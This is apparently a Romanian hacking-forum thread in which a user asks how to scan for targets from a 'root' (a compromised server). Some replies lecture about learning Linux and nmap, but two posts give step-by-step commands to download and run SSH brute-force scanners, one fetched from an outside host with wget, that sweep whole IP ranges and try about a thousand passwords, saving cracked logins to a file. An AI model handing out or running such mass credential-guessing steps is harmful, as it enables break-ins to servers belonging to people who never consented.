Jump to content
Acer

Scanare de pe un root

Recommended Posts

Cînd am zis de TCP/IP ?i Networking la asta m-am referit

Chiar dac? cineva ?i-ar spune nu ai în?elege ?i ai pune alte întreb?ri

Nu se poate ob?ine ceva dac? lipsesc piesele de baza dintr-un puzzle

Întrebarea mea este cum ai sa scanezi ceva dac? nu cuno?ti protocoalele ?

Obiectivul nu ar fi cum sa scanezi dar ce sa scanezi ?

Tocmai am mai scris cîteva cuvinte care au fost rescrise de multe ori , oare cî?i mai au r?bdare sa rescrie istoria cu acelea?i cuvinte?

Edited by pyth0n3
Link to comment
Share on other sites

situatia sta in felul urmator

situatie: am amanta (sunt hacker)

complicatie : sta in china (vreau multe "ruturi")

rezolvare: merg la cea ( scanez dupa alte "ruturi")

problema : cu ce? ( de unde scanez?)

solutie: imi iau masina (am un "rut")

problema2: nu stiu sa conduc (habar nu am cu ce fac cu "rut")

solutie: fac scoala (invat ceea ce ii acela un "rut" si ce pot face cu el)

trebuie sa iti faci rost sau iti faci un soft/scanner care sa iti caute acele nologine sau ce vrei tu. Tu zici ca ai "rut" asa si ? si eu am admin pe windows si ce ?

Link to comment
Share on other sites

situatia sta in felul urmator

situatie: am amanta (sunt hacker)

complicatie : sta in china (vreau multe "ruturi")

rezolvare: merg la cea ( scanez dupa alte "ruturi")

problema : cu ce? ( de unde scanez?)

solutie: imi iau masina (am un "rut")

problema2: nu stiu sa conduc (habar nu am cu ce fac cu "rut")

solutie: fac scoala (invat ceea ce ii acela un "rut" si ce pot face cu el)

trebuie sa iti faci rost sau iti faci un soft/scanner care sa iti caute acele nologine sau ce vrei tu. Tu zici ca ai "rut" asa si ? si eu am admin pe windows si ce ?

Administrator pe Windows e una si ROOT pe linux e alta, e mare diferenta intre windows si linux

Link to comment
Share on other sites

@Acer - te judeca lumea fara sa te cunoasca si bazat numai pe intrebarea ta.

In primul rand nu ai cunostinte de Linux, deci te sfatuiesc sa faci un download la un torrent de cursuri Linux (Linux+ de la CompTIA de ex.) si sa te documentezi tu singur. Nu le place la nimeni sa dea mura in gura! Sunt de parere ca un curs invatzat de unu' singur te va educa mult mai mult decat crezi tu.

Daca nu ai timp de un curs intreg, citeste ceva macar despre nmap(insecure.org) si optiunile programului.

Bafta!

Link to comment
Share on other sites

1. Bagi linux

2. wget http://linuxtrade.webs.com/xxplex/fukers.gz

3. tar -xf fukers.gz

4. cd fuckers

5. chmod +x *

6. ./ash IP.IP (scaneaza o clasa B de ip-uri dupa hosturi cu portul 22 deschis, hosturile care le gaseste cu portul 22 deschis o sa le bage intr-un fisier mfu.txt creat de el)

Poti sa scanezi doar clase B de IP-uri. Gen scanezi clasa 207.100, atunci dai comanda ./ash 207.100 si il lasi asa. Dupa ce termina de scanat hosturile si le salveaza in mfu.txt, o sa le ia la rand si o sa incerce toate parolele din fisierul pass_file (sunt vreo 900).

Daca urmezi pasii de mai sus, o sa iti mearga fara probleme. Daca gaseste vreun user si o parola care merg, o sa iti creeze un fisier vuln.txt si ti le salveaza acolo. Nologine-urile nu ti le salveaza, dar ti le afiseaza acolo in linia de comanda.

Bafta

Link to comment
Share on other sites

1.Bagi linux/te rogi sa faci rost de un rut

2.wget https://codeload.github.com/bssh2/SSH-Brute-Force-Scanner/zip/gh-pages

3.[Daca e linux proaspat facut pe pc,trebuie,in unele cazuri si la cele "cumparate"] : apt-get install unzip

4.unzip SSH-Brute-Force-Scanner-gh-pages

5.cd SSH-Brute-Force-Scanner-gh-pages

6.chmod +x * [spatiu intre +x si *]

7.  daca ai drept user scanezi gosh [adica ex 2.*.*.*] - ./scan_root [clasa ex "2"] sau drept de user [scan mix,ex 2.2.*.* ] Comanda: ./scan_user [clasa ex 2.2]

Apoi o sa vezi un fisier vuln sau ceva de genu , unde scrie NoBash nu sunt bune ok? are in jur de 1k parole deci ar fi ff ok,unul dintre primele scannere

 

--Stiu ca e topic vechi,ma gandesc ca va ajuta pe cineva candva

  • Downvote 3
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...